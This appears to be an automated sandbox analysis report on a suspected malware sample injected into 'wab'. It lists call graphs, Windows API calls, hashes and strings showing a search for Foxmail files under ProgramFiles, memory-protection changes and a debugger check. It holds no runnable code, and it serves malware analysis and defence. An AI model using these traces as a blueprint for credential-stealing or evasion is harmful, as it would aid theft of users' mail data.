IsProcessorFeaturePresent 6201->6203 6202->6184 6205 20a02b58 6203->6205 6213 20a02b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6205->6213 6207 20a02c3b 6207->6184 6208->6198 6212 20a056b9 RtlLeaveCriticalSection 6209->6212 6211 20a047e3 6211->6200 6212->6211 6213->6207 6217 20a05b7a GetLastError 6214->6217 6218 20a05b93 6217->6218 6219 20a05b99 6217->6219 6236 20a05e08 6218->6236 6223 20a05bf0 SetLastError 6219->6223 6243 20a0637b 6219->6243 6225 20a05bf9 6223->6225 6224 20a05bb3 6250 20a0571e 6224->6250 6225->6189 6229 20a05bb9 6231 20a05be7 SetLastError 6229->6231 6230 20a05bcf 6263 20a0593c 6230->6263 6231->6225 6234 20a0571e _free 17 API calls 6235 20a05be0 6234->6235 6235->6223 6235->6231 6268 20a05c45 6236->6268 6238 20a05e2f 6239 20a05e47 TlsGetValue 6238->6239 6240 20a05e3b 6238->6240 6239->6240 6241 20a02ada _ValidateLocalCookies 5 API calls 6240->6241 6242 20a05e58 6241->6242 6242->6219 6248 20a06388 __dosmaperr 6243->6248 6244 20a063c8 6246 20a06368 _free 19 API calls 6244->6246 6245 20a063b3 RtlAllocateHeap 6247 20a05bab 6245->6247 6245->6248 6246->6247 6247->6224 6256 20a05e5e 6247->6256 6248->6244 6248->6245 6249 20a0474f __dosmaperr 7 API calls 6248->6249 6249->6248 6251 20a05729 HeapFree 6250->6251 6255 20a05752 _free 6250->6255 6252 20a0573e 6251->6252 6251->6255 6253 20a06368 _free 18 API calls 6252->6253 6254 20a05744 GetLastError 6253->6254 6254->6255 6255->6229 6257 20a05c45 __dosmaperr 5 API calls 6256->6257 6258 20a05e85 6257->6258 6259 20a05ea0 TlsSetValue 6258->6259 6260 20a05e94 6258->6260 6259->6260 6261 20a02ada _ValidateLocalCookies 5 API calls 6260->6261 6262 20a05bc8 6261->6262 6262->6224 6262->6230 6274 20a05914 6263->6274 6269 20a05c75 __crt_fast_encode_pointer 6268->6269 6272 20a05c71 6268->6272 6269->6238 6270 20a05c95 6270->6269 6273 20a05ca1 GetProcAddress 6270->6273 6271 20a05ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6271->6272 6272->6269 6272->6270 6272->6271 6273->6269 6275 20a05854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 6274->6275 6276 20a05938 6275->6276 6277 20a058c4 6276->6277 6278 20a05758 __dosmaperr 20 API calls 6277->6278 6279 20a058e8 6278->6279 6279->6234 6281 20a01ca6 _strlen 6280->6281 6281->6176 6903 20a020db 6905 20a020e7 ___DestructExceptionObject 6903->6905 6904 20a02110 dllmain_raw 6906 20a0212a 6904->6906 6915 20a020f6 6904->6915 6905->6904 6909 20a0210b 6905->6909 6905->6915 6916 20a01eec 6906->6916 6908 20a02177 6910 20a01eec 31 API calls 6908->6910 6908->6915 6909->6908 6912 20a01eec 31 API calls 6909->6912 6909->6915 6911 20a0218a 6910->6911 6913 20a02193 dllmain_raw 6911->6913 6911->6915 6914 20a0216d dllmain_raw 6912->6914 6913->6915 6914->6908 6917 20a01ef7 6916->6917 6918 20a01f2a dllmain_crt_process_detach 6916->6918 6919 20a01f1c dllmain_crt_process_attach 6917->6919 6920 20a01efc 6917->6920 6925 20a01f06 6918->6925 6919->6925 6921 20a01f01 6920->6921 6922 20a01f12 6920->6922 6921->6925 6926 20a0240b 6921->6926 6931 20a023ec 6922->6931 6925->6909 6939 20a053e5 6926->6939 7050 20a03513 6931->7050 6936 20a02408 6936->6925 6937 20a0351e 7 API calls 6938 20a023f5 6937->6938 6938->6925 6945 20a05aca 6939->6945 6942 20a0351e 7021 20a03820 6942->7021 6944 20a02415 6944->6925 6946 20a05ad4 6945->6946 6947 20a02410 6945->6947 6948 20a05e08 __dosmaperr 11 API calls 6946->6948 6947->6942 6949 20a05adb 6948->6949 6949->6947 6950 20a05e5e __dosmaperr 11 API calls 6949->6950 6951 20a05aee 6950->6951 6953 20a059b5 6951->6953 6954 20a059c0 6953->6954 6958 20a059d0 6953->6958 6959 20a059d6 6954->6959 6957 20a0571e _free 20 API calls 6957->6958 6958->6947 6960 20a059ef 6959->6960 6961 20a059e9 6959->6961 6963 20a0571e _free 20 API calls 6960->6963 6962 20a0571e _free 20 API calls 6961->6962 6962->6960 6964 20a059fb 6963->6964 6965 20a0571e _free 20 API calls 6964->6965 6966 20a05a06 6965->6966 6967 20a0571e _free 20 API calls 6966->6967 6968 20a05a11 6967->6968 6969 20a0571e _free 20 API calls 6968->6969 6970 20a05a1c 6969->6970 6971 20a0571e _free 20 API calls 6970->6971 6972 20a05a27 6971->6972 6973 20a0571e _free 20 API calls 6972->6973 6974 20a05a32 6973->6974 6975 20a0571e _free 20 API calls 6974->6975 6976 20a05a3d 6975->6976 6977 20a0571e _free 20 API calls 6976->6977 6978 20a05a48 6977->6978 6979 20a0571e _free 20 API calls 6978->6979 6980 20a05a56 6979->6980 6985 20a0589c 6980->6985 6991 20a057a8 6985->6991 6987 20a058c0 6988 20a058ec 6987->6988 7004 20a05809 6988->7004 6990 20a05910 6990->6957 6992 20a057b4 ___DestructExceptionObject 6991->6992 6999 20a05671 RtlEnterCriticalSection 6992->6999 6994 20a057be 6997 20a0571e _free 20 API calls 6994->6997 6998 20a057e8 6994->6998 6996 20a057f5 _abort 6996->6987 6997->6998 7000 20a057fd 6998->7000 6999->6994 7003 20a056b9 RtlLeaveCriticalSection 7000->7003 7002 20a05807 7002->6996 7003->7002 7005 20a05815 ___DestructExceptionObject 7004->7005 7012 20a05671 RtlEnterCriticalSection 7005->7012 7007 20a0581f 7013 20a05a7f 7007->7013 7009 20a05832 7017 20a05848 7009->7017 7011 20a05840 _abort 7011->6990 7012->7007 7014 20a05a8e __fassign 7013->7014 7016 20a05ab5 __fassign 7013->7016 7015 20a07cc2 __fassign 20 API calls 7014->7015 7014->7016 7015->7016 7016->7009 7020 20a056b9 RtlLeaveCriticalSection 7017->7020 7019 20a05852 7019->7011 7020->7019 7022 20a0382d 7021->7022 7026 20a0384b ___vcrt_freefls@4 7021->7026 7023 20a0383b 7022->7023 7027 20a03b67 7022->7027 7032 20a03ba2 7023->7032 7026->6944 7037 20a03a82 7027->7037 7029 20a03b81 7030 20a03b99 TlsGetValue 7029->7030 7031 20a03b8d 7029->7031 7030->7031 7031->7023 7033 20a03a82 try_get_function 5 API calls 7032->7033 7034 20a03bbc 7033->7034 7035 20a03bd7 TlsSetValue 7034->7035 7036 20a03bcb 7034->7036 7035->7036 7036->7026 7038 20a03aaa 7037->7038 7042 20a03aa6 __crt_fast_encode_pointer 7037->7042 7038->7042 7043 20a039be 7038->7043 7041 20a03ac4 GetProcAddress 7041->7042 7042->7029 7048 20a039cd try_get_first_available_module 7043->7048 7044 20a03a77 7044->7041 7044->7042 7045 20a039ea LoadLibraryExW 7046 20a03a05 GetLastError 7045->7046 7045->7048 7046->7048 7047 20a03a60 FreeLibrary 7047->7048 7048->7044 7048->7045 7048->7047 7049 20a03a38 LoadLibraryExW 7048->7049 7049->7048 7056 20a03856 7050->7056 7052 20a023f1 7052->6938 7053 20a053da 7052->7053 7054 20a05b7a __dosmaperr 20 API calls 7053->7054 7055 20a023fd 7054->7055 7055->6936 7055->6937 7057 20a03862 GetLastError 7056->7057 7058 20a0385f 7056->7058 7059 20a03b67 ___vcrt_FlsGetValue 6 API calls 7057->7059 7058->7052 7060 20a03877 7059->7060 7061 20a038dc SetLastError 7060->7061 7062 20a03ba2 ___vcrt_FlsSetValue 6 API calls 7060->7062 7067 20a03896 7060->7067 7061->7052 7063 20a03890 7062->7063 7064 20a038b8 7063->7064 7065 20a03ba2 ___vcrt_FlsSetValue 6 API calls 7063->7065 7063->7067 7066 20a03ba2 ___vcrt_FlsSetValue 6 API calls 7064->7066 7064->7067 7065->7064 7066->7067 7067->7061 7115 20a0281c 7118 20a02882 7115->7118 7121 20a03550 7118->7121 7120 20a0282a 7122 20a0358a 7121->7122 7123 20a0355d 7121->7123 7122->7120 7123->7122 7124 20a047e5 ___std_exception_copy 21 API calls 7123->7124 7125 20a0357a 7124->7125 7125->7122 7126 20a0544d ___std_exception_copy 26 API calls 7125->7126 7126->7122 7510 20a04bdd 7511 20a04c08 7510->7511 7512 20a04bec 7510->7512 7514 20a06d60 51 API calls 7511->7514 7512->7511 7513 20a04bf2 7512->7513 7516 20a06368 _free 20 API calls 7513->7516 7515 20a04c0f GetModuleFileNameA 7514->7515 7517 20a04c33 7515->7517 7518 20a04bf7 7516->7518 7533 20a04d01 7517->7533 7519 20a062ac ___std_exception_copy 26 API calls 7518->7519 7521 20a04c01 7519->7521 7523 20a04e76 20 API calls 7524 20a04c5d 7523->7524 7525 20a04c72 7524->7525 7526 20a04c66 7524->7526 7528 20a04d01 38 API calls 7525->7528 7527 20a06368 _free 20 API calls 7526->7527 7532 20a04c6b 7527->7532 7529 20a04c88 7528->7529 7531 20a0571e _free 20 API calls 7529->7531 7529->7532 7530 20a0571e _free 20 API calls 7530->7521 7531->7532 7532->7530 7535 20a04d26 7533->7535 7537 20a04d86 7535->7537 7539 20a070eb 7535->7539 7536 20a04c50 7536->7523 7537->7536 7538 20a070eb 38 API calls 7537->7538 7538->7537 7542 20a07092 7539->7542 7543 20a054a7 __fassign 38 API calls 7542->7543 7544 20a070a6 7543->7544 7544->7535

                                                            Control-flow Graph

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 20A01137
                                                            • lstrcatW.KERNEL32(?,?), ref: 20A01151
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 20A0115C
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 20A0116D
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 20A0117C
                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 20A01193
                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 20A011D0
                                                            • FindClose.KERNEL32(00000000), ref: 20A011DB
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                            • String ID:
                                                            • API String ID: 1083526818-0
                                                            • Opcode ID: 6da1bc1c03ed10c01eb3c114d13c6401314fc4044a0b9b0e66d8257531f716d2
                                                            • Instruction ID: 6382690461562ba430d5ee046f32fb8fa38f042db034294e899cd17dd8b03ed9
                                                            • Opcode Fuzzy Hash: 6da1bc1c03ed10c01eb3c114d13c6401314fc4044a0b9b0e66d8257531f716d2
                                                            • Instruction Fuzzy Hash: B821C37250430C6BD714EBA49C49FDB7BDDEF84314F400A2ABA59D3190E734D6458796
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 127 434c5b5-434c5ea 128 434c5f0-434c5ff call 434be7d 127->128 130 434c601-434c608 128->130 131 434c60a-434c615 128->131 130->131 132 434c617-434c61e Sleep 131->132 133 434c620 131->133 132->127 135 434c64e-434c696 NtProtectVirtualMemory call 434be7d 133->135 137 434c69b-434c6ab 135->137 137->127
                                                            APIs
                                                            • Sleep.KERNEL32(00000005), ref: 0434C61B
                                                            • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0434C691
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3747634275.0000000004017000.00000040.00000400.00020000.00000000.sdmp, Offset: 04017000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_4017000_wab.jbxd
                                                            Similarity
                                                            • API ID: MemoryProtectSleepVirtual
                                                            • String ID:
                                                            • API String ID: 3235210055-0
                                                            • Opcode ID: 50730229852f0cde3b89d7d64218a19b81b890a8ddec03e520232cf63f6483d4
                                                            • Instruction ID: 5aa81cbf8f47ffe083d65a307ac52f28bc253d94286f3a321dda4f6dc371a848
                                                            • Opcode Fuzzy Hash: 50730229852f0cde3b89d7d64218a19b81b890a8ddec03e520232cf63f6483d4
                                                            • Instruction Fuzzy Hash: 8C1178B0A413008FE7488F30CC8DBDEB7E5AF503A1F4B91A9AD018B4A2D368E4C08F11
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 20A01434
                                                              • Part of subcall function 20A010F1: lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 20A01137
                                                              • Part of subcall function 20A010F1: lstrcatW.KERNEL32(?,?), ref: 20A01151
                                                              • Part of subcall function 20A010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 20A0115C
                                                              • Part of subcall function 20A010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 20A0116D
                                                              • Part of subcall function 20A010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 20A0117C
                                                              • Part of subcall function 20A010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 20A01193
                                                              • Part of subcall function 20A010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 20A011D0
                                                              • Part of subcall function 20A010F1: FindClose.KERNEL32(00000000), ref: 20A011DB
                                                            • lstrlenW.KERNEL32(?), ref: 20A014C5
                                                            • lstrlenW.KERNEL32(?), ref: 20A014E0
                                                            • lstrlenW.KERNEL32(?,?), ref: 20A0150F
                                                            • lstrcatW.KERNEL32(00000000), ref: 20A01521
                                                            • lstrlenW.KERNEL32(?,?), ref: 20A01547
                                                            • lstrcatW.KERNEL32(00000000), ref: 20A01553
                                                            • lstrlenW.KERNEL32(?,?), ref: 20A01579
                                                            • lstrcatW.KERNEL32(00000000), ref: 20A01585
                                                            • lstrlenW.KERNEL32(?,?), ref: 20A015AB
                                                            • lstrcatW.KERNEL32(00000000), ref: 20A015B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                            • String ID: )$Foxmail$ProgramFiles
                                                            • API String ID: 672098462-2938083778
                                                            • Opcode ID: 9de8779a8cdc99023c0677912d88ed84dcdaf9b6f7da33d203c55be2fc60387f
                                                            • Instruction ID: 54ce39b3aa1015ef56d9b04da5987f479ca962d39c1848431ce125b10756eac7
                                                            • Opcode Fuzzy Hash: 9de8779a8cdc99023c0677912d88ed84dcdaf9b6f7da33d203c55be2fc60387f
                                                            • Instruction Fuzzy Hash: A0818171A4435CA9DB20DBE0AC86FEE7379FF84710F40059AF608EB190EA715A85CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(20A0C7DD), ref: 20A0C7E6
                                                            • GetModuleHandleA.KERNEL32(?,20A0C7DD), ref: 20A0C838
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 20A0C860
                                                              • Part of subcall function 20A0C803: GetProcAddress.KERNEL32(00000000,20A0C7F4), ref: 20A0C804
                                                              • Part of subcall function 20A0C803: VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,20A0C7F4,20A0C7DD), ref: 20A0C816
                                                              • Part of subcall function 20A0C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,20A0C7F4,20A0C7DD), ref: 20A0C82A
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                            • String ID:
                                                            • API String ID: 2099061454-0
                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                            • Instruction ID: 0e224f9bca28772b677a2324312f95f25ad89ae08d030f1415a62ebf18e88f4c
                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                            • Instruction Fuzzy Hash: C9012210A4525939EA1057F43C06BAA5FDAAB33660BA4D756F20086093E9A4890EC3AE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 79 20a0c7a7-20a0c7bc 80 20a0c82d 79->80 81 20a0c7be-20a0c7c6 79->81 83 20a0c82f-20a0c833 80->83 81->80 82 20a0c7c8-20a0c7f6 call 20a0c7e6 81->82 90 20a0c7f8 82->90 91 20a0c86c-20a0c86e 82->91 85 20a0c872 call 20a0c877 83->85 86 20a0c835-20a0c83d GetModuleHandleA 83->86 89 20a0c83f-20a0c847 86->89 89->89 92 20a0c849-20a0c84c 89->92 95 20a0c7fa-20a0c7fe 90->95 96 20a0c85b-20a0c85e 90->96 93 20a0c870 91->93 94 20a0c866-20a0c86b 91->94 92->83 97 20a0c84e-20a0c850 92->97 93->92 94->91 102 20a0c865 95->102 103 20a0c800-20a0c80b GetProcAddress 95->103 98 20a0c85f-20a0c860 GetProcAddress 96->98 100 20a0c852-20a0c854 97->100 101 20a0c856-20a0c85a 97->101 98->102 100->98 101->96 102->94 103->80 104 20a0c80d-20a0c81a VirtualProtect 103->104 105 20a0c82c 104->105 106 20a0c81c-20a0c82a VirtualProtect 104->106 105->80 106->105
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,20A0C7DD), ref: 20A0C838
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 20A0C860
                                                              • Part of subcall function 20A0C7E6: GetModuleHandleA.KERNEL32(20A0C7DD), ref: 20A0C7E6
                                                              • Part of subcall function 20A0C7E6: GetProcAddress.KERNEL32(00000000,20A0C7F4), ref: 20A0C804
                                                              • Part of subcall function 20A0C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,20A0C7F4,20A0C7DD), ref: 20A0C816
                                                              • Part of subcall function 20A0C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,20A0C7F4,20A0C7DD), ref: 20A0C82A
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                            • String ID:
                                                            • API String ID: 2099061454-0
                                                            • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                            • Instruction ID: 403c2d7cffc36746fdf3ebe33f9d0ea7dd86fd630710f9345911d7f3b89f5d86
                                                            • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                            • Instruction Fuzzy Hash: C8214B215082896FE7118BF46C05BA67FDAEB27270F58C696E140CB143E5A8894DC3FE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 107 20a0c803-20a0c80b GetProcAddress 108 20a0c82d 107->108 109 20a0c80d-20a0c81a VirtualProtect 107->109 112 20a0c82f-20a0c833 108->112 110 20a0c82c 109->110 111 20a0c81c-20a0c82a VirtualProtect 109->111 110->108 111->110 113 20a0c872 call 20a0c877 112->113 114 20a0c835-20a0c83d GetModuleHandleA 112->114 116 20a0c83f-20a0c847 114->116 116->116 117 20a0c849-20a0c84c 116->117 117->112 118 20a0c84e-20a0c850 117->118 119 20a0c852-20a0c854 118->119 120 20a0c856-20a0c85e 118->120 121 20a0c85f-20a0c865 GetProcAddress 119->121 120->121 124 20a0c866-20a0c86e 121->124 126 20a0c870 124->126 126->117
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,20A0C7F4), ref: 20A0C804
                                                            • VirtualProtect.KERNEL32(?,00000078,?,?,00000000,00000000,20A0C7F4,20A0C7DD), ref: 20A0C816
                                                            • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,20A0C7F4,20A0C7DD), ref: 20A0C82A
                                                            • GetModuleHandleA.KERNEL32(?,20A0C7DD), ref: 20A0C838
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 20A0C860
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: AddressProcProtectVirtual$HandleModule
                                                            • String ID:
                                                            • API String ID: 2152742572-0
                                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                            • Instruction ID: 03e8cdfc41b10c649947d53732aac262495042eff8af0a27331ef728ef1422dd
                                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                            • Instruction Fuzzy Hash: D7F0C251A452483DFA1147F43C45FBA5FCE9B37660BA49A56F200C7183E899890E93FE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 20A061DA
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 20A061E4
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 20A061F1
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: e366b1642fe03184406fb5f27019cb28561117320349f1323b347d76e3175947
                                                            • Instruction ID: 00df6bea1078645b8cc08e7b3cbfe4e69640f892e20640f98e4f1fe9c9c89aaf
                                                            • Opcode Fuzzy Hash: e366b1642fe03184406fb5f27019cb28561117320349f1323b347d76e3175947
                                                            • Instruction Fuzzy Hash: 3A31C275D0122C9BDB21DF68D98879DBBB9BF08310F9041DAE91CA7260E7749B828F45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?,20A04A8A,?,20A12238,0000000C,20A04BBD,00000000,00000000,00000001,20A02082,20A12108,0000000C,20A01F3A,?), ref: 20A04AD5
                                                            • TerminateProcess.KERNEL32(00000000,?,20A04A8A,?,20A12238,0000000C,20A04BBD,00000000,00000000,00000001,20A02082,20A12108,0000000C,20A01F3A,?), ref: 20A04ADC
                                                            • ExitProcess.KERNEL32 ref: 20A04AEE
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 078a347cfc5fc1b4b4adb935f26bae0cc7a68e2d184f8d5c3c8b0fc84e25debd
                                                            • Instruction ID: 5455f93d38880ddca9629702f403469a339ddf1703fa58d8c719c8606eabab66
                                                            • Opcode Fuzzy Hash: 078a347cfc5fc1b4b4adb935f26bae0cc7a68e2d184f8d5c3c8b0fc84e25debd
                                                            • Instruction Fuzzy Hash: 8FE0BF7614460CAFCF01AF95DD19B493B6BFF41381F908054F9094B121DB3ADD43DA54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            • Opcode ID: 86011b3b3667b0f8e58295a78d13bb7798a97efd17a0b7c9c9f47f93fa87d7b2
                                                            • Instruction ID: 0a6c0cd73255b6ffe5fc6e24c4b2e35a02ad7ab3dfeb2a2432682f2d00727830
                                                            • Opcode Fuzzy Hash: 86011b3b3667b0f8e58295a78d13bb7798a97efd17a0b7c9c9f47f93fa87d7b2
                                                            • Instruction Fuzzy Hash: 09A012316045028F4700CF704A1930D35AE67001807404014640FC4020E72880136700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000008.00000003.1699231813.0000000004EBD000.00000004.00000020.00020000.00000000.sdmp, Offset: 04EBD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_3_4ebd000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 661f8dc1abccfe97b5e643cefb8d9ec9f9f07c15d965e7528ef90cccb633838c
                                                            • Instruction ID: 505bf0101535fecc5a1959588c3984bef153d1732d063c5480e4c56599ca8d23
                                                            • Opcode Fuzzy Hash: 661f8dc1abccfe97b5e643cefb8d9ec9f9f07c15d965e7528ef90cccb633838c
                                                            • Instruction Fuzzy Hash: B76289316083598FD324CF28C5846AABBF1FF85384F155A3DE9A58B350E771E94ACB42
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 147 20a0173a-20a017fe call 20a0c030 call 20a02c40 * 2 154 20a01803 call 20a01cca 147->154 155 20a01808-20a0180c 154->155 156 20a01812-20a01816 155->156 157 20a019ad-20a019b1 155->157 156->157 158 20a0181c-20a01837 call 20a01ede 156->158 161 20a0183d-20a01845 158->161 162 20a0199f-20a019ac call 20a01ee7 * 2 158->162 163 20a01982-20a01985 161->163 164 20a0184b-20a0184e 161->164 162->157 166 20a01995-20a01999 163->166 167 20a01987 163->167 164->163 168 20a01854-20a01881 call 20a044b0 * 2 call 20a01db7 164->168 166->161 166->162 170 20a0198a-20a0198d call 20a02c40 167->170 181 20a01887-20a0189f call 20a044b0 call 20a01db7 168->181 182 20a0193d-20a01943 168->182 176 20a01992 170->176 176->166 181->182 198 20a018a5-20a018a8 181->198 184 20a01945-20a01947 182->184 185 20a0197e-20a01980 182->185 184->185 187 20a01949-20a0194b 184->187 185->170 189 20a01961-20a0197c call 20a016aa 187->189 190 20a0194d-20a0194f 187->190 189->176 193 20a01951-20a01953 190->193 194 20a01955-20a01957 190->194 193->189 193->194 195 20a01959-20a0195b 194->195 196 20a0195d-20a0195f 194->196 195->189 195->196 196->185 196->189 199 20a018c4-20a018dc call 20a044b0 call 20a01db7 198->199 200 20a018aa-20a018c2 call 20a044b0 call 20a01db7 198->200 199->166 209 20a018e2-20a0193b call 20a016aa call 20a015da call 20a02c40 * 2 199->209 200->199 200->209 209->166
                                                            APIs
